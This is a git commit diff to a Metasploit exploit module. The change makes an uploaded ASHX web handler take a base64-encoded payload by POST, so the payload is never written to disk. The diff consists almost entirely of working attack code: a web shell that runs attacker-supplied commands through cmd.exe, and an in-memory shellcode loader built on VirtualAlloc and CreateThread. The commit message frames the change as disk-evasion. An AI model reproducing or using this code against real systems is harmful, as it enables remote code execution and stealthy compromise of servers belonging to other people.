POST the payload.encoded data when we trigger the ASHX file, this way we dont drop the Metasploit payload to disk.
This commit is contained in:
parent
f6b1c9b1ce
commit
eded0e7788
|
@ -207,7 +207,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
})
|
||||
|
||||
if target['Arch'] == ARCH_CMD
|
||||
|
||||
payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>
|
||||
using System;
|
||||
using System.Web;
|
||||
|
@ -215,13 +214,21 @@ using System.Diagnostics;
|
|||
|
||||
public class #{vars[:var_handler_class]} : IHttpHandler
|
||||
{
|
||||
public void ProcessRequest(HttpContext ctx)
|
||||
public void ProcessRequest(HttpContext #{vars[:var_ctx]})
|
||||
{
|
||||
if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {
|
||||
return;
|
||||
}
|
||||
|
||||
byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);
|
||||
|
||||
string #{vars[:var_payload]} = System.Text.Encoding.UTF8.GetString(#{vars[:var_bytearray]});
|
||||
|
||||
ProcessStartInfo #{vars[:var_psi]} = new ProcessStartInfo();
|
||||
|
||||
#{vars[:var_psi]}.FileName = "cmd.exe";
|
||||
|
||||
#{vars[:var_psi]}.Arguments = "/c #{payload.encoded.gsub('\\', '\\\\\\\\')}";
|
||||
#{vars[:var_psi]}.Arguments = "/c " + #{vars[:var_payload]};
|
||||
|
||||
#{vars[:var_psi]}.RedirectStandardOutput = true;
|
||||
|
||||
|
@ -233,8 +240,6 @@ public class #{vars[:var_handler_class]} : IHttpHandler
|
|||
public bool IsReusable { get { return true; } }
|
||||
})
|
||||
else
|
||||
var_payload = Rex::Text.numhexify(payload.encoded, Rex::Text::DefaultWrap, '', '', '', '', ',')
|
||||
|
||||
payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>
|
||||
using System;
|
||||
using System.Web;
|
||||
|
@ -249,9 +254,13 @@ public class #{vars[:var_handler_class]} : IHttpHandler
|
|||
[System.Runtime.InteropServices.DllImport("kernel32")]
|
||||
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);
|
||||
|
||||
public void ProcessRequest(HttpContext ctx)
|
||||
public void ProcessRequest(HttpContext #{vars[:var_ctx]})
|
||||
{
|
||||
byte[] #{vars[:var_bytearray]} = { #{var_payload} };
|
||||
if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {
|
||||
return;
|
||||
}
|
||||
|
||||
byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);
|
||||
|
||||
IntPtr #{vars[:var_func_addr]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{vars[:var_bytearray]}.Length, 0x3000, (IntPtr)0x40);
|
||||
|
||||
|
@ -305,12 +314,20 @@ public class #{vars[:var_handler_class]} : IHttpHandler
|
|||
#
|
||||
# 7. Trigger the payload by requesting the extensions .ashx file.
|
||||
#
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'App_Extensions', plugin_guid, payload_ashx),
|
||||
'keep_cookies' => true
|
||||
)
|
||||
if target['Arch'] == ARCH_CMD
|
||||
payload_data = payload.encoded.gsub('\\', '\\\\\\\\')
|
||||
else
|
||||
payload_data = payload.encoded
|
||||
end
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'App_Extensions', plugin_guid, payload_ashx),
|
||||
'keep_cookies' => true,
|
||||
'vars_post' => {
|
||||
vars[:var_payload_key] => Base64.strict_encode64(payload_data)
|
||||
}
|
||||
)
|
||||
unless res&.code == 200
|
||||
fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to trigger payload.')
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue